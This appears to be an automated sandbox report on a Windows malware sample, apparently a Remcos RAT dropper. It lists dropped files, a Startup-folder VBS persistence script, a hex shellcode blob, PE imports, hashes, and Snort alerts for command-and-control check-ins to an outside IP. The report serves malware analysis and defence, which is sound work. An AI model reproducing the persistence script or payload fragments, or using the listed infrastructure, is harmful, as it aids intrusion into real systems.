File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x1c4d7e57, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	20447232
Entropy (8bit):	1.2830233246655096
Encrypted:	false
SSDEEP:	12288:BJSPOhijljKhBfvUDv22+555ckQB8WBbXnE:2ii9JDZ+
MD5:	DD73B6F11CF4D24150010822306129D1
SHA1:	9A1063BFEFA6C672634DCD61830644A9A1A70947
SHA-256:	36EF53DA18DDAEA5DDA608DAF0629738EF482ABB6471D5FA5DEA04D1E2F8B8EB
SHA-512:	36A461B57F90E8696D873B6840D7FB0EF104AC0F3353630FD4E71613E521C43B1363186F88DE3704263FBEE80FB2021785393B986A2C8E3D41E295A8F9DBEFAF
Malicious:	false
Preview:	.M~W... ........=......J}...0...{........................"..........{i......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;.................................'.[L.....{....................U......{...........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\differences

Process:	C:\Users\user\Desktop\cnaniAxghZ.exe
File Type:	ASCII text, with very long lines (29748), with no line terminators
Category:	dropped
Size (bytes):	29748
Entropy (8bit):	3.5540950742492776
Encrypted:	false
SSDEEP:	768:+iTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbYE+I3Oib4vfF3if6gyY:+iTZ+2QoioGRk6ZklputwjpjBkCiw2RD
MD5:	51E0AB199327273ADD3BFD656C34C6CF
SHA1:	0C7254BD8478DBD1734270DAFAE940D6B0CF5F89
SHA-256:	B1AE5302E6F6F9ACA842B7970A08BB5D552166B4E52755B44A80ECC33B368F2B
SHA-512:	BA49BEFC03BA3DCCE299FCD7A1A53B32427092275E11F85B4167C362CDD57CC5BED3E1A060875391A38AC59E7602C580EE46903A260EAEEBC01CC375E3859225
Malicious:	false
Preview:	163AC42442F39BB8E63A241CE8BF9A50A5A6D78EC74962A21C0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c0000

C:\Users\user\AppData\Local\Temp\ncqkhweaghcgworcchyfyhlbjpqn

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Local\Temp\semispinalis

Process:	C:\Users\user\Desktop\cnaniAxghZ.exe
File Type:	data
Category:	dropped
Size (bytes):	494080
Entropy (8bit):	7.64534429396745
Encrypted:	false
SSDEEP:	12288:Z1pAok+T2grcAzEAF53Klvp3Ku373t2mXeLXXj:Wok+aHSEWg6SgXj
MD5:	213529D027991B34EBDA0D39BE4B21B0
SHA1:	AE5CF13BD9040E882A31B530919B745544AA781B
SHA-256:	BC8E2CA93AAAC34D8CEBD37458AB7C4BC94C3CB0D0164BBAD39EEA5101474052
SHA-512:	405804CD6AFECD9EC0A056DF4F8BC3B2D8DB44580081E54173AAE0D17F3C550A4AA66C2AC0B4567D12ABE640731D120C4B56F5A52007E31A4F97128A23A8E1FA
Malicious:	false
Preview:	...GAZV8UHCA..CP.GTSTAYD.BZV8QHCA08CPPGTSTAYDGBZV8QHCA08CPPGDRTAW[.LZ.1.i.@\|.b.8.'s$36#5#7v[0&-.D.!5p5!=t(7d...vU>,&o=5ItPGTSTAYH..w..6...F...9.5p?...<.0./...N.%w.......9...F..Q?z....,...:..)J..=...<:.....'...$..66..F..8x..?..m<.../..Oq....=0<...9BZV8QHCA08CPPGTS..YD.C]Vc`.&A08CPPGT.TCXOFLZVJTHCU28CPPG..WAYTGBZ.=QHC.08SPPGVSTDYEGBZV8THBA08CPPg\STEYDGBZV:QH.A0(CP@GTSTQYDWBZV8QHSA08CPPGTSTA.AB^W8QH.F0..PPGTSTAYDGBZV8QHCA0.DP.\|TS.._D.BZV8QHCA08CPPGTSTAY..DZN8QH;.68.PPGTSTAYDGBZ.=Q.GA08CPPGTSTAYDGBZV8QHCA08CP~31+ AYD23_V8AHCAB=CPTGTSTAYDGBZV8QHcA0Xm"4& 2TA.=FBZ.=QH9@085UPGTSTAYDGBZV8.HC..\"$1GTS..YDGR]V8_HCA.>CPPGTSTAYDGBZ.8Q.m5\KCPPG]STAY4@BZT8QH.G08CPPGTSTAYDG.ZV../%(TKCP`ETST.^DGFZV8QOCA08CPPGTSTAY.GB.xJ": A08c.PGT.SAY.GBZR?QHCA08CPPGTST.YD.l(3T>+CA..CPP.SST}YDG.]V8QHCA08CPPGT.TA.DGBZV8QHCA08CPPGTSTAYDGBZV8QHCA08CPPGTSTAYDGBZV8QHCA08CPPGTSTAYDGBZV8QHCA08CPPGTSTAYDGBZV8QHCA08CPPGTSTAYDGBZV8QHCA08CPPGTSTAYDGBZV8QHCA08CPPGTSTAYDGBZV8QHCA08CPPGTSTAYDGBZV8QHCA08CPPGTSTAYDGBZV8QHCA0

C:\Users\user\AppData\Local\directory\name.exe

Process:	C:\Users\user\Desktop\cnaniAxghZ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	106213376
Entropy (8bit):	7.999578812473445
Encrypted:	true
SSDEEP:	393216:o63GS6ANDQqmNsDO5JNUrjV1DrFB1hHlFp1zpj0kT77GMlnR6CelByBkTozgh96D:73GSXOKDUu1Dr37Ftf1nFR
MD5:	60C09330C233F3B7A6759B8A719245CA
SHA1:	9D391DE921942A341AB52447593DF8A5F92D39B8
SHA-256:	89C1BC0357A6002E303799507E9DC9D8784253AD440D03A2101033274D3F87BC
SHA-512:	22AC3D02FE52B9FD52F5E0D0A0BAE93B3D919A2C4D3A518C78AA953F8EF2208DA77341FD02B26F348CA344F734B94004968766B14E5267D4E3C87EC22060F30A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L.....=f.........."...............................@.................................4O....@...@.......@.........................\|...............................4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc................4..............@..@.reloc..4q.......r...>..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	268
Entropy (8bit):	3.4209455304240626
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfcloRKUEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNloRKQ1A1z4mA2n
MD5:	D3A871A22DFC23DD6763F6002299B13A
SHA1:	B7934BFD389FE7FBDC08710EDABA4C16D3EED618
SHA-256:	FEA868420602CDAF96C19BE169F6BA44178494DB3B8F6292DCD7B8A8BB194F66
SHA-512:	6166B8A0DED88F7C8F3CC1D92A44A0A112B4CFCBEEB3934005E89B32614C79BB7F7ABDBF8CF84D90D4864C425460673739935562B344AE14FFE1076F5D0F7CA9
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.29971460744594
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	cnaniAxghZ.exe
File size:	1'355'776 bytes
MD5:	0f85ff8e8caa7715b1ed7243ebbfcf9a
SHA1:	5a600b6b969e4071d37936acf40cd3e2ba934262
SHA256:	9993b780d61a1d757de704d2b6459cbac20803e5e2a2374cbea719aaadbb1344
SHA512:	897ac6a505330167480da72feef5c383a864e50cc9fa0eabf97f61b4468e588caa17c319c400279e1676091fb5f308200cc523167c209685d914eafdf4f0b3db
SSDEEP:	24576:yAHnh+eWsN3skA4RV1Hom2KXMmHauzTyk3Ez/i0Y+ZsH7IA9H/4NZTMFd39T5:1h+ZkldoPK8YauzTykR++HcA9H/uMFdn
TLSH:	1C55CF0273D5C036FFABA2739B6AF60156BD79254133852F13982DB9BD701B1223E663
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x663DACFD [Fri May 10 05:13:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F0610CD522Dh
jmp 00007F0610CC7FE4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F0610CC816Ah
cmp edi, eax
jc 00007F0610CC84CEh
bt dword ptr [004C41FCh], 01h
jnc 00007F0610CC8169h
rep movsb
jmp 00007F0610CC847Ch
cmp ecx, 00000080h
jc 00007F0610CC8334h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F0610CC8170h
bt dword ptr [004BF324h], 01h
jc 00007F0610CC8640h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F0610CC830Dh
test edi, 00000003h
jne 00007F0610CC831Eh
test esi, 00000003h
jne 00007F0610CC82FDh
bt edi, 02h
jnc 00007F0610CC816Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F0610CC8173h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F0610CC81C5h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x80900	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x149000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x80900	0x80a00	57558a9a495231a7952b9cb771ec0574	False	0.9489093628522838	data	7.937521312683499	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x149000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x77b98	data			1.0003181128566534
RT_GROUP_ICON	0x148350	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1483c8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1483dc	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1483f0	0x14	data	English	Great Britain	1.25
RT_VERSION	0x148404	0x10c	data	English	Great Britain	0.5970149253731343
RT_MANIFEST	0x148510	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/03/24-14:50:54.905973	TCP	2032776	ET TROJAN Remcos 3.x Unencrypted Checkin	49737	8087	192.168.2.4	107.175.229.139
07/03/24-14:50:55.983200	TCP	2032777	ET TROJAN Remcos 3.x Unencrypted Server Response	8087	49737	107.175.229.139	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 14:50:54.899487972 CEST	49737	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:54.904473066 CEST	8087	49737	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:54.904659986 CEST	49737	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:54.905972958 CEST	49737	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:54.911597013 CEST	8087	49737	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:55.983200073 CEST	8087	49737	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:55.985121012 CEST	49737	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:55.990083933 CEST	8087	49737	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.093238115 CEST	8087	49737	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.095649004 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.100626945 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.102797985 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.102871895 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.108067989 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.140104055 CEST	49737	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.157850981 CEST	49739	80	192.168.2.4	178.237.33.50
